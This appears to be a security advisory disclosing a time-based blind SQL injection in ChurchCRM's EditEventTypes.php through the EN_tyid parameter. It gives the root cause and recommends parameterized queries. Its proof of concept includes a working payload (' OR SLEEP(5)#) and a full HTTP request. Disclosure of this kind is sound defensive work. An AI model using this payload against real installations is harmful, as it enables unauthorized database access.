Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Description

The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.

This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.

Proof of Concept

Triggering response delays with MySQL sleep function through Time-based SQL Injection.

Affected Parameter: EN_tyid

Payload: ' OR SLEEP(5)#

POST /churchcrm/EditEventTypes.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/churchcrm/EditEventTypes.php
Cookie: CRM-2c90cf299230a50dab55aee824ed9b08=10amb7tfpmsvp76h7kcqtggqf3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

EN_tyid=1'+OR+SLEEP(5)%23&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=10%3A30%3A00&newCountName=

Root Cause

User input on the Event parameter is not sanitized and used directly in the query through string concatenation. https://github.com/ChurchCRM/CRM/blob/master/src/EditEventTypes.php#L33,L71

Recommendation

Avoid direct string concatenation into the sql query. It's recommended to use input sanitization as well as implementing parameterized query.